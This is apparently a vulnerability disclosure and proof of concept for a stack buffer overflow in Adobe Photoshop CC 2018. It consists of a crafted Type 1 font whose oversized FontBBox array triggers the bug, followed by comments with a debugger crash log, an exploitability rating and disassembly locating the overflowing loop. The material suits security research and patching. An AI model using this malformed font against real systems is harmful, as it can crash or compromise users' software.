%!PS-AdobeFont-1.1: CMMI10 1.100 %%CreationDate: 1996 Jul 23 07:53:57 % Copyright (C) 1997 American Mathematical Society. All Rights Reserved. 11 dict begin /FontInfo 7 dict dup begin /version (1.100) readonly def /Notice (Copyright (C) 1997 American Mathematical Society. All Rights Reserved) readonly def /FullName (CMMI10) readonly def /FamilyName (Computer Modern) readonly def /Weight (Medium) readonly def /ItalicAngle -14.04 def /isFixedPitch false def end readonly def /FontName /CMMI10 def /PaintType 0 def /FontType 1 def /FontMatrix [0.001 0 0 0.001 0 0] readonly def /Encoding 256 array 0 1 255 {1 index exch /.notdef put} for dup 11 /alpha put dup 12 /beta put dup 13 /gamma put dup 18 /theta put dup 21 /lambda put dup 22 /mu put dup 25 /pi put dup 26 /rho put dup 30 /phi put dup 58 /period put dup 59 /comma put dup 60 /less put dup 62 /greater put dup 64 /partialdiff put dup 65 /A put dup 67 /C put dup 68 /D put dup 70 /F put dup 73 /I put dup 77 /M put dup 85 /U put dup 86 /V put dup 100 /d put dup 101 /e put dup 102 /f put dup 103 /g put dup 110 /n put dup 112 /p put dup 117 /u put dup 118 /v put dup 120 /x put dup 121 /y put dup 122 /z put readonly def /FontBBox{-32 -250 1048 750 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337}readonly def /UniqueID 5087385 def currentdict end currentfile eexec D9D66F633B846A97B686A97E45A3D0AA0529731C99A784CCBE85B4993B2EEBDE 3B12D472B7CF54651EF21185116A69AB1096ED4BAD2F646635E019B6417CC77B 532F85D811C70D1429A19A5307EF63EB5C5E02C89FC6C20F6D9D89E7D91FE470 B72BEFDA23F5DF76BE05AF4CE93137A219ED8A04A9D7D6FDF37E6B7FCDE0D90B 986423E5960A5D9FBB4C956556E8DF90CBFAEC476FA36FD9A5C8175C9AF513FE D919C2DDD26BDC0D99398B9F4D03D5993DFC0930297866E1CD0A319B6B1FD958 9E394A533A081C36D456A09920001A3D2199583EB9B84B4DEE08E3D12939E321 990CD249827D9648574955F61BAAA11263A91B6C3D47A5190165B0C25ABF6D3E 6EC187E4B05182126BB0D0323D943170B795255260F9FD25F2248D04F45DFBFB DEF7FF8B19BFEF637B210018AE02572B389B3F76282BEB29CC301905D388C721 59616893E774413F48DE0B408BC66DCE3FE17CB9F84D205839D58014D6A88823 D9320AE93AF96D97A02C4D5A2BB2B8C7925C4578003959C46E3CE1A2F0EAC4BF 8B9B325E46435BDE60BC54D72BC8ACB5C0A34413AC87045DC7B84646A324B808 6FD8E34217213E131C3B1510415CE45420688ED9C1D27890EC68BD7C1235FAF9 1DAB3A369DD2FC3BE5CF9655C7B7EDA7361D7E05E5831B6B8E2EEC542A7B38EE 03BE4BAC6079D038ACB3C7C916279764547C2D51976BABA94BA9866D79F13909 95AA39B0F03103A07CBDF441B8C5669F729020AF284B7FF52A29C6255FCAACF1 74109050FBA2602E72593FBCBFC26E726EE4AEF97B7632BC4F5F353B5C67FED2 3EA752A4A57B8F7FEFF1D7341D895F0A3A0BE1D8E3391970457A967EFF84F6D8 47750B1145B8CC5BD96EE7AA99DDC9E06939E383BDA41175233D58AD263EBF19 AFC0E2F840512D321166547B306C592B8A01E1FA2564B9A26DAC14256414E4C8 42616728D918C74D13C349F4186EC7B9708B86467425A6FDB3A396562F7EE4D8 40B43621744CF8A23A6E532649B66C2A0002DD04F8F39618E4F572819DD34837 B5A08E643FDCA1505AF6A1FA3DDFD1FA758013CAED8ACDDBBB334D664DFF5B53 95601766776D4F09024EFFA59E6176AFB1FCA154B3072BAD4FAD58611DC4B5FE 4721C679FD0C9063A7BF16271BA4CF88836178B315E214AF2E76F4ED9EBFB02F B3C30D8F9F808B3F10D07C1C026C616BA3BAF6EA02CD9927FC4989F34D38C5CF B92F377658A321DFA315C68F3C463DC43A121AE6697522A243577EA2458E7A3E 50AC38BB2E65435F1C3C311B913C770B51CAFDE0071F399D0959D114BCC91997 F5136F6EABB32E1A435FB41F6B66C0B2C43882130630853AB9DBAFA018613B1E 8E53108F13C412AE5FDF5AE811328D61E0C1C23D0444C22690AFF5A4AFA2B0E3 36346A889395C7EF5777D9C5D2C22725A7AF54C83E0DAAD2CFFD74BBA7DC3E97 B6796437DE4E5569DFFAA1C0606E1AA3F0566423EE321E796057C7158872F6DF C7BD781403B42FC231A40A5809F20DF2D337D2AEC64782702CE4063FB4FE1CBF F64C03A73EA8625C9128338FB33E1B34562A74C7E302498FA354ED12CDF0955A 502F41AB757B4702D56EC0997D6F98EF5443FE6602210ABAC3A9FCD64349A179 7D1ECB8E55BABC40E53772DB6E58D85885FAD1A1497A32D7D207CE19F798EA0E EAD9F4EDCA1EC761B5A0D8760B8C4F3662261BC429928C8F88970DD32A557B8E E49502689ED399250B6C012D4432BFA199FF2737DEE17AA1E32BD23E40887516 F9A848EDD36EC34B8522DFAD0996CCC9557839E16F06F345CD3575BFC8BC6BE6 6F5A1BF8CC94DEFD461EFCB02682BB95CC7ACE3FA52740F371D7EB9CA00A72F9 3DC5F5186517E36EBED8E26D9639265887276FC555C55D1855175888FEB29D0F D54A05DCEBC8D1B423E0D983498F13851E6AC1A4AA0F374E2EBB0F671F1AA1A8 6A928816724CC9EB0A32F867D720BE7E0063B0CE205D51CF9916A36B9FEB3321 61EDD65520211F3DA17974A7DBB8FFBAAE6ED30516A985328837E5BCDADE6DD3 3966EFF786B5D0EF721D73501E3C7B575739C2A83863FEEA2763CFA8F21F42BB 8EF9075EA5902DF84DC019D818182AC0A5B1AEB6E575917953D22CC57D655142 63ED835BC8BFE7024C4DFDD441B7DD937AC1E884459F71436809079DF4FF6471 CD92BB75068ECE0379DFE2DA66A52CE74A875B1A3EBC3429E94C20F5C372809E 0751B3DA252B4BCEDD402F1EFC10C5C22C642F6C82C091D58A0F212BD1F6AC5A 544F5712FF4272B90C80F18003A83164F676D7248A5B11A8769BED8D8D535B8F A3346942A4FECF593795F576329EC7DDF79E53FDC52AB909336957FB2B3DBB23 F605780047C55B0BE6A6F6F0A58670641CD809E23040EC8940E8CA6B309733F0 0D06CCDB2DF7F48CD902B7BE149E7C5F73081851BF8C1EFC945D4CCF5D7DD685 B98E9E4D6F16A9F74CE384A39A63B9EB386442FB18E1D39906579CE42B942189 060367EE51DF6342993E68B90F506A7037A2B548B25CE07AA0B2D3132F1EA0B0 E2BBF3DAA9F9D0A156C28C333C85392556A1B4679326938B12128D35134245F6 F271C1B858E17D0FEB0E99B659121B3CC0FA3A7FA1E6DFF4B4F5337D1CC84067 11EB01A0CDBA65913A507D1604C8482B949F4A71EA4735323254184367FB68B3 B9A3AC611C0B62C4C97A1007B70F3019F62F164D22C419540222E8D033C7F628 115B031F2E7EEF8AEBB7D520EF6D1C61CA2505E16B4855AEF44955E1A4617E92 0CB97633A6F7362E65A3C04BED154AF88E3A6D64960BC019B8F1FB107D7904A8 2FD80DA6F6A857391DC28231BC0EE4AFEED8170CDF8F9B4B77829205BD5CA122 58EB0FD25CC99CEB8BFE56A69FFD22362BDD2634B39FBD96901F1C123392272F 05FB33298D44B8E416A12BC5B53173048C32BFF6F29C3BDC4213988044A908C9 6B9A1ABA9C052C4DD57AB177C3F5692D438C73D292DF33BC87428F982ECF4DAA 5C6399FC9B62A48B6878425CE558BF2A302B91D26D213E8BA528C3452A7E1F06 643933DCAF5D4EB1429B229EF61BE9C76F1EBC051CA010E3A4FE26D1F855B022 F0285B91C35504FF12FF98E3DE08792274788B6993C1459A0164F6C31283B43A B618055F526AF15C85FF493EDD36DF6B48AAEB2EDBF509580D147B4BB615814A BB0A080890BF112C295C04D99EB9D3F257B2DC63023DAB01AC9437F2D6025ED4 84FEEC7AAD1D77E0D3CD6ECA6EDD92FF5C9EF7C7916F04688EEB42A4ED977F71 D590F50D7BF5A76AEBBD65DFD00A8FBEAFB269A76994E10F2FC09EB34E017040 2A56CDDDD39E7A9FDC5814ED74469C55B215B72824FD598221776781EC6E98EF 6511319BEF631C5E21343D9B44AA12A56B326FF62405C146B50C0D8C13CAE9E5 514E9192B048E2AD6E638A6BBA54407F2876E3A2EC9A37BE5A35309D8CCE9E47 272B140706E9BCA0C21F38BF77A5BD2B5BFB6FED766B87D311E86A9AA011ECF1 906C8745F3CC14C79453EB5E2BDDB347F3B1DFD0DFC3BAE0F71707933221F95D 9CFC22E71B8863B5F79487D0EA516FBDBD8B7AB8815D6B0928969610186DE799 020A0B1784AEF18E5203ED3C6BE2157FD93A4DFC703C5737F484B9E7E3264DFD A7962CC849E0AA847866EDF8C4693C9FA53C7AB90C76EDB5988BE2AAE637D4B7 390E6FD502C5F89AEC3B7FAF59D986B336FD3751F2B29784D22D7C99190F913F 9263123EC9A3DE68B2993CAD3DAAC25B677A11D1C4491388DF0F41ADA0B57FA3 63486027C0F91487D827C28AEB37902CA7A823C0D8761F4E072DEECD0F6399EC 0F9E8CDA826915F3A874F90ED0317D89E083925949A7A8BA2A3DA3429F102192 0CCD7F04CCEF77E05ED8DEA13B1660D5B27341E54336F800E7D91EE3F6260556 6A89A00BC302C9F1DB453C2EECDBB83FF01B31590684C6AFEA1DB2303200DA22 3C5FF42DDB3909902F136E5B1FC36B1546EBE35F61B3ADF2942021B82422A816 BAF81FF8EBD36E930F46FEE018B66FE1DF68411DE51606DC9612D84445D99080 1C6EC632D71E8A7742F4C434BED02D039A144BBB85D96D994F224EBAFA3CB681 C9769B944B142C44B3523955393ECF3A76B432D9E6A7B724425D5CBB32C83219 A9BA3454C6EF6529A5D86DC2965DD2972F68DCA73891F5A7347CD9D60581415E 762FC3F51D7DD5E8FADCA307859F22099EBC2C0DDA7C72FF9FB047151B9A5230 5D883DC944B5CBB1B476FB9AE166B8D76B1CC0F4192594B552F5DDF187C70F68 19E8B302FB48A99F8782BEA0B72BCE2CEBDEDB0EEEB7C409E2439932E9D6B554 38D6A9FAB99F70064612C512B02FF9E3A40DEB6B5DF2B054A583E4F1BA085974 803F59927818E6D29465F5AF3D14396FE3C161523BB7992F70DC85E047425828 F099A652BC5598A5925568D96023F83A8190000F4D420FE25CFEABF008487F0E 55D6B4415ACFF920D810BAD4B4C0F4F2F5A5E83C7AE50A942FA0092F03301739 C5DA47D39B4D7E1FA16AC67D4C1231CE8159145397A129B2166BCE09E4307C25 3BD05756CFC9488F4EBADA907C66FE06820BD36ED8FA50EBE291C40630B28F37 9EC9001E847C48F4EAC0B5364EC61863CCA30B9BF541AF3844F44F24E9B5A91F D459BC9E61EBFE040F29263E81D25ECEDF9992C58B008F8596F777B95E326C9D 4391F49F0BB65A8077950A2A0EB59C73BB183C056458642158514EF13EA65B82 2BC164ABE1966AEB3014F76C7F25D1E312D614B3F6357E6D956304E1DC5121FE 97B99E88483CF579916DAD9BFCFC12090F23C1CC67BC61529E097995435F43EA 94E1D5753E8D33946148D9A966356A89550439F8E15AC75AFA8BBDA4810BF57A 7B98CB8DF0DBADB5E7C014E3F65F3C8DA035E7CC10CFBA4A6885ED72EEA5D298 11D25FB508997A4CFF88CFD15A958D93AFE2C59FDB2B35F45B08D9AA58B56412 571789F2F8D428727F1A68169387A331236C059FA778EBF87D54C97DBA99EAF1 E676A60FF189E43AD665653DA394032EF4833DC62A3BFC4B617A01E06B204440 E16942FEB1299D4B7CA68DF0DF6612256A1EFE17875D2568F19F0490BC92904A EE6B6D0F3B8D8854BFC42AAC19FFE981E6F2518718A32242A0011CD1F7BB99F2 06A895181987934B7E25A53E509E2AF034C7389DF733C2F011623E1D797AE264 AC0DC7A6DA91876F5019FD9650EA3DE1FC9DEF4285E535EE9310355450F7E465 2967CCDCCEB70F5CF237275FE7B509F208024937F61B2985F7E1C24F34FA540B 55B7237CE79AF6B90E1C481D4D8639AF514C945F40572E70BC88E07552857807 7C91CFFED2C4D4EE5C054A8C9E35AF6216AC7F127B5A4C4B871BF27F06166820 37D4972502DCC662FD5D98037B3251ED782C9448AA3B2AF8099541B927B35401 E3A2D1D12336C049784A3F1F30169FE473E4F2D5E03124D6F13E4E06367D2FC9 5FE9886A0C9DE7655AD9AC2F2B8F43002FD2B41A8D8FA2D7B8AAF2BD6E54AE94 C6D24CFDBA23AB82A9905F80CEE259EB52A3F62026E862D35C1939190427CC6B FE92985C53273501683BB0B2AB312FF4BF42E7D7304F45DBABC19B5BFC73BF6C E4EE7408CF574EC875279D9BBC0B4ED8B7A495C28D5AE530C0C76E9AA4F9B8E3 234DCC414B97213A63CA6293E3E3F9864EDEE04A2DA00A6628A41480DE82AE8B 22AF0C4E442B07D7B9BFBC5ED574C86DC774C9D21D9A54F2AD2231F62E35ACCD 5B564AFB52EBFF773124311B4F83A487199BB74D2F8F22A9D8E4FAD5C0E4D0C3 953CF05C519AF3A50F8F85B2B17BEE0EA8B6D068B37B0C5DA517440E55FE08E2 B16B18D5CBD86B7FB4F208F8B7420AB30502B15EBCCF5CFA4E6F01CB062FB817 1198F19F80FF084A48A9A946E20C415F73F20DB21A71902536BCDE24D0CBAD77 16D9B3C24492FB516A77BC1D55DECD497EBC1439BE4A5A38A9D9925571233213 B5632D52756153D6777282A3303BC9776BBEF1A9F36FC184057531102E18BE77 9B524ECC856DCC6B4C15857B1108C06C5B82D1490096C1E87EEF58B9F4A2BD93 5EDB3BCB50A429F05AFFC4E0EFFF5B15058E1B8CA0C9B7D2EB8F2767234A7DD8 B527E2947B942017897E7A42053DBE4473532F57D1510DDEB688CCB9AF2F12EA 107C309E5C9A73E2C4C35193A5DC3268B80374CE36B9157DA49AFA73CE80673D 6DCFB540F6827C1E7105B4BD29C431FA781DDBF43FE7A6F1AD554B0ACE1F6DC4 37779B83CC8A7E921AFC2D9064B50375A59F8DA19DCAFC1E70E2BCF4E81D58BF 116657D199174B411D88FE6A41A9A9ED1AA6FAB9591F74F69DA6447A076E887F 8955F24164C30A897993682B067DF80BAC33D71C80A600893CA17149578DB558 83A7697357FAE2B131E094576638C8B9CDAA0A7E7842F07B23D8034940491005 D38F29443FFF0D9207A33B52AB5F520B543EFBAED92E8C1B59D04F3323EA4130 3F40CBE99A5CC7EF434408926D652EDD716CFF362D3F2156761154C2C39F515D F26C1B55A58664026B71A4D66465189815CDA838D6147047096BC39DD5BAA3F8 5176DEE7C21742A862554DFDDFA1DF580D7E8C6DFAC12AF5800CB3706C75D303 61A000D1711E940897170248272903CF558A3B9EED332688E5D8EF3C9EFA3B3F 905AD4B17DA41C12FE946FAD2AA9A86A77D23CFE6803ABA70C3930D04E8F85BD D3D579205094FECC8CD28914073DF874017E59320F25E4719F0E7511F893FF38 7CE056055CD3DA069BA13E0674A4DFD17ABDB2544B306DE54E4FA0CDE5691385 4F727AD76B04096D71B65B9E0FF6224B4C8AF185D040409A0DFF89FE13A5594E CCC593A8689D874199F669DA127BBF70DBE4424B94C810F843773BE522EBE845 7558E59ACAFF17F1168D14339C6C9CA399251ACD0AB723A38DDCD69B01477004 BBBA575044CCBA1477D9DF8E0EC834C0E2882D7138A7ADCF73C2AD284037716B F31144CB8FAA4E33B822B903051BA236705926A7038E9E1EBDD5E21D5CFCAB54 A83CC6764ACC0AD8496171E05DD0A5896B73576071613F883A995991FEDABCB2 2ABCB59DAB634426AC405C045A28893547039989419BCE2EA708BFAA12697950 8F39C032BFCCDDD98AFFE165E46C86BA87898118F2119EA64CC87FED3E796784 B12A11F54EC6ADD7C51A2C92EEB0FD26AC7281C9175A92CF75BB6A8DA3EAE9B1 49818CE6136319718B88EEA0B7806767E93C19781F9A9DF64C8E81AAE85CDB76 FB5495BED3AC88DDFA16859A40CE8CA8DEA4493648D34A1350CE9086CA5A2A7C 0AF66A6876D67D465F16DAA74D241B80384C18611AE0CBF6041412DA0BA41AAA CB9C2ED3FB0F085A0624BC0EC6D85CDCD0001BE6C617742592648D22905387E0 C167E293199E781E7E09D39C30D2DDA89A80E016E2BDAFB4EDB25044E8B7F0E6 A1F3F063C9D00843F00263A6711349A4D99D8D75DC852C76ADFF27E2E40643AA F92BB033FC966C7359C2514C10E287EEBA8916C35F363008F8C1363AE7D7802E 7AF2E4D8E957C81839A368F93D336595DD2DEB11D546F042E8C21F0605B7545A CE368069FB9726D1F977AB2ECF4BA189CEA5F1293CA87CC565CEC82923D30AE1 5B38E1921B2AF3106E586AA9605A1EB85224EEC3247F9B65AE7B9610197B0103 844F1E75E340963974F2EDEA1C1478483E8FE221D2DAD0F881BA6B4E8AEC083E CA2CAA72767BB6A32FE8E209DECB743510677954945A79D458B921786CAA6FBB AA1122145FE19A650D8064D5560C8AA267F6E285638AC2B345B074B4A68FC935 7BCF6DB898249A703323CF4D1D18D0B01ABF64FF8A562BDE28A9B65D70297EA2 38ED03F1E6EFC7F87AEDEB09B329BFC093390A840DF50E6CCE0EA6D124919B16 6BFF042944CC8040045EE709292CE98C591D71603FF263FBBAF408488F5A734A A01218D8936863745FED46C5285B25D7306E52029464FFCFF9502AE8E6248A8B 6F8CDAD5FCD5C961890E2350176B00E1E34F42C136D6F2CF1F69F2A79AC5B630 18A61F259FA7689DD0E32DD6415E70D5728192015F94DCDDE14F859BBC120543 DC625507D3F2098275D87C431312C437EA611D822AF090E647FC1AA949A150F3 6FBEC872DCB2756AAA2D5791B3FCEE1E52D2E8D177C3E69BD6E55F1FC285B1E9 319D48B687AD658DCA06D6CA16F7D192A6E89EF4CC741550187C5B1360C5917F E993D4A32F299F49C0FDE38E518C2D93AC970D40165F29F6A42AC3AEEBDDA6CA DD860CED28678B01DBFEBBA7532935779C9CAADA665239134CB421D16F4D24B1 486E4F4946CCE1FB5D8994ECB3F2FB853D427D7979F2D1D6CA1653B6EBE32064 AC12A858EDA4036B843B1C79B300AB5B6560E8E838ACE3F49240918035F2FE1E 62A233DD1B911F1C7D551AF5257A21BF66885417A2BFD24B06B9601303BFAA3B 7281F95C8B40B67FB77626A4EA87248551F3E2B001CDE9BFBEFCC730E1E18D48 43532F155E276BF9A7CA8407F5FF84A264FDFA49DB9D495BAA53CC65F765CAE0 8ED159C596B94077ABC413DA4472398DE11B17129811CCAC2BA48668F64A0243 E17A9D0812A4BD5E38DF12BFA2838E66A17FB87F20D46CC17C562F8DC1023C5B 714D85277B4D9FFB71EC008CC41A16A098DDE8F9DCDADDF14A3F4DAD8657B7A9 201846536E41B9934FC8633A65A849B820FB2E51EE1CD6F53A50E0023139D987 809C492E5BD3B3879B8A7543F1C4CA7972B88E45EB94BF8085E0C0CB5EA1D204 61DA73DACFDE4CC741119564936D651D0A0B790078C4B229F776C0CBF217CC7B 08C18E399DDD846773CB5B9F7A1F39DF6EF5B83D85718F162B577D4279E05856 0774CEF8E47C5EA77AC016939330FA1A51E1E2E100A9665A1DDE8410DD413745 0F5244B940250B61830480E8F563FBAA6E4CB2DEFC82162B1A8C09A5D3F470AF 959558B7B075E951332B53A2069070880EC3040DE22159F9B6F48355C1B2D270 CFA741C46C218D62C04D54519224A485742979F50BD45011E05F04E2F594CBED 1B0D411A7D2587870C6FDCF7AE4D1E408BF6B66D6B826A427BECBEF55D82DDDD 50FFF1C1962D6F2D81FB050B60CC6AA74B7292A16426CBB565615BF60A881A9C 9DB9A8FFD937F8B0EFCB0F992927FC59B78B45C545CADE2A54791E3DBA3E9F0D B6BF14499D4C0C758CBC09037AD3828689404005FA2DD419343EA6EC91128B61 4C5DA0B792FDCC0B248D5853BE2E1EB9A51418E32119B35332A3A714A13A2E3A 390B24D212B070338F3F0F240E5F8864242741EAB379B90966DE283524DE1D4E 91F6FA3128AE5485837F8949CEBE18A51CE9AB4479B98D226A735EAF763E7FE2 732205EACFAB5DC84E57D6788178A88ECB99D69520FA5271B04B5C8497FD3992 B207D771E7BF8E3AECCAE0C723162344AFB005B4EAB4E92A9ADDA0A7542FAE67 09E022138177A1229FD4B62B987CE1E70DD0F904DF6A46FC4C09A703B873507E C931B366EDC69DA8401AF65333F2168458CE140303DC56E25F5B516C64798977 FEC0CC3F07CD63AF3C46156C30A1D36FEF6CFBC31FFC4B49016DCE533F925D3D 50AB23AA654B70139D87BFDAF13B810D4EA6AFCC857259D25C8B4A3C02B57380 2BEEFAA6C1856F93BE103A2097591F5E19552ADA91C34C7BF4772935995252A2 2E0D6A6BA227BA050ECB30AE857DD6DA3963D2E10E5873FB5E8D9A9FFD642621 3BBAB4058D700FE50E4B012C9AD470EF0198CFDCFCC6191EEC3C26E97B901E2D 1CA5B455D0EE03F7E09735D5947528D3AE28063734D399ADB94D42532E906D7A 7E23EDB3B94A88D595209CA6EE0ECD896A1F23FB7EC5EA1E2B44874A9E6CC09D 5FDDE84B57A5F26893A11D5A56567F5589711D12FBBD0FDABC04AFBE382F24AF 094B1ADB336FCC8F6D6BE86E8A03CF4351C57AA513382FA1BA91A24E55F2CC16 97AF3CFD1EFBD4E111090D1FF0E4270F7182BD191D289C53783F05156FE4ACEC 9C7E9D4467ED6852E4D897AC05AA2FAA72ED0BB01DF92E9257BAEAC5E19F80EC C24783BE097FC3A9B36D87806B5E9F304622FFC6A7F9B553381EEA0607AAFFCF 1322085B99B8D899A0176557103EDF0BBB5368470680E73132E13F8ABB509F2B EBA0C0F7F10774225FC75D1B2874F9330C204EDEC05240519C6F71C871C6535D 6CF8A3B3F785961747130EFA5711B59BE7F459CA09870794DE44D32E1305591E EAC44E3BF81642ADDE6B866A3B8E90B067BB2B45F85AFF8F9211CC300F2DFCF0 B973741EEA854E 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 cleartomark /CMMI10 findfont 12 scalefont setfont newpath 50 700 moveto (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%%^&*()_-+=) show showpage % Adobe Photoshop CC Type 1 Font FontBBox array Stack Buffer Overflow Remote Code Execution Vulnerability % Summary: % ======== % A specially crafted postscript type 1 font file can trigger a stack buffer overflow via a crafted FontBBox array. % Analysis: % ========= % A large FontBBox array can overflow a stack var and lead to a stack based buffer overflow. In this example, I supplied a poc with the following: % /FontBBox{-32 -250 1048 750 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337}readonly def % Debugging: % ========== % STATUS_STACK_BUFFER_OVERRUN encountered % (133c.850): Break instruction exception - code 80000003 (first chance) % *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Adobe Photoshop CC 2018 (32 Bit)\MPS.dll - % eax=00000000 ebx=503aad2c ecx=77a2e4d0 edx=002abf0d esi=00000000 edi=002ac8cc % eip=77a2e34d esp=002ac154 ebp=002ac1d0 iopl=0 nv up ei pl zr na pe nc % cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 % kernel32!UnhandledExceptionFilter+0x5f: % 77a2e34d cc int 3 % 0:000> kv % # ChildEBP RetAddr Args to Child % 00 002ac1d0 50126724 503aad2c 002ac50c 5012682f kernel32!UnhandledExceptionFilter+0x5f (FPO: [Non-Fpo]) % WARNING: Stack unwind information not available. Following frames may be wrong. % 01 002ac1dc 5012682f 503aad2c 00000012 002ac224 MPS!MPSToAGMColorSpace+0x12274 % 02 002ac50c 502556ef 001b2493 45a2b7ec c2000000 MPS!MPSToAGMColorSpace+0x1237f % 03 002ac594 5012a452 00000001 01002092 459948bc MPS!MPSCT5NewServer+0x7957f % 04 002ac5e4 5012a6de 002ac720 00000000 002ac8cc MPS!MPSToAGMColorSpace+0x15fa2 % 05 002ac614 5012774a 00000001 00000009 00000000 MPS!MPSToAGMColorSpace+0x1622e % 06 002ac64c 50352b4a 00000000 00000002 00000000 MPS!MPSToAGMColorSpace+0x1329a % 07 002ac680 50352855 00000003 00000002 00000002 MPS!MPSCT5NewServer+0x1769da % 08 002ac694 503532cf 45a0cc24 0000000c 00000000 MPS!MPSCT5NewServer+0x1766e5 % 09 002ac708 503537a2 45a0cc24 00000010 00000010 MPS!MPSCT5NewServer+0x17715f % 0a 00000000 00000000 00000000 00000000 00000000 MPS!MPSCT5NewServer+0x177632 % 0:000> !load msec % 0:000> !exploitable % !exploitable 1.6.0.0 % Exploitability Classification: EXPLOITABLE % Recommended Bug Title: Exploitable - Stack Buffer Overrun (/GS Exception) starting at MPS!MPSCT5NewServer+0x000000000007957f (Hash=0xe6ea5d40.0x979b8c29) % An overrun of a protected stack buffer has been detected. This is considered exploitable, and must be fixed. % Static Analysis: % ================ % Since the stack var comes from sub_10165500, I'm marking the bug to be in this function. % .text:10165500 sub_10165500 proc near ; CODE XREF: sub_1012DE70+396 % .text:10165500 ; sub_1012F0D0+1FC % .text:10165500 % .text:10165500 var_1C = byte ptr -1Ch % .text:10165500 var_14 = dword ptr -14h % .text:10165500 var_10 = dword ptr -10h % .text:10165500 var_C = dword ptr -0Ch % .text:10165500 var_8 = dword ptr -8 % .text:10165500 var_4 = dword ptr -4 % .text:10165500 arg_0 = dword ptr 8 % .text:10165500 arg_4 = dword ptr 0Ch % .text:10165500 arg_8 = dword ptr 10h % .text:10165500 % .text:10165500 push ebp % .text:10165501 mov ebp, esp % .text:10165503 sub esp, 1Ch % .text:10165506 mov eax, ___security_cookie % .text:1016550B xor eax, ebp % .text:1016550D mov [ebp+var_4], eax % .text:10165510 mov ecx, [ebp+arg_8] % .text:10165513 mov edx, [ebp+arg_0] % .text:10165516 push ebx % .text:10165517 push edi % .text:10165518 mov edi, [ebp+arg_4] % .text:1016551B test ecx, ecx % .text:1016551D jnz loc_10165621 % .text:10165523 lea eax, [ebp+var_1C] % .text:10165526 push eax % .text:10165527 mov eax, dword_10351CA8 % .text:1016552C add eax, 670h % .text:10165531 push eax % .text:10165532 push edx % .text:10165533 call sub_1021BA70 % .text:10165538 add esp, 0Ch % .text:1016553B test eax, eax % .text:1016553D jz loc_101655F9 % .text:10165543 push esi % .text:10165544 lea eax, [ebp+var_14] % .text:10165547 push eax % .text:10165548 lea eax, [ebp+var_1C] % .text:1016554B push eax ; size 0x10 (4 elements expected) % .text:1016554C call sub_1010DD40 ; stack overflow % In sub_1010DD40, we see the following code: % .text:1010DD80 loc_1010DD80: ; CODE XREF: sub_1010DD40+76 % .text:1010DD80 lea eax, [ebp+var_10] % .text:1010DD83 push eax % .text:1010DD84 lea eax, [ebp+var_8] % .text:1010DD87 push eax % .text:1010DD88 call sub_10260BD0 % .text:1010DD8D mov eax, [ebp+var_10] % .text:1010DD90 add esp, 8 % .text:1010DD93 and al, 0F0h % .text:1010DD95 cmp al, 10h % .text:1010DD97 jnz short loc_1010DDA3 % .text:1010DD99 movd xmm0, [ebp+var_C] % .text:1010DD9E cvtdq2ps xmm0, xmm0 % .text:1010DDA1 jmp short loc_1010DDA8 % .text:1010DDA3 ; --------------------------------------------------------------------------- % .text:1010DDA3 % .text:1010DDA3 loc_1010DDA3: ; CODE XREF: sub_1010DD40+57 % .text:1010DDA3 movss xmm0, [ebp+var_C] % .text:1010DDA8 % .text:1010DDA8 loc_1010DDA8: ; CODE XREF: sub_1010DD40+61 % .text:1010DDA8 mov eax, [ebp+arg_4] % .text:1010DDAB inc esi % .text:1010DDAC movss dword ptr [eax+edi*4], xmm0 ; stack overflow right here % .text:1010DDB1 movzx edi, si ; edi is the counter % .text:1010DDB4 cmp edi, ebx ; ebx is the # of elements in the array % .text:1010DDB6 jb short loc_1010DD80 ; jump back into loop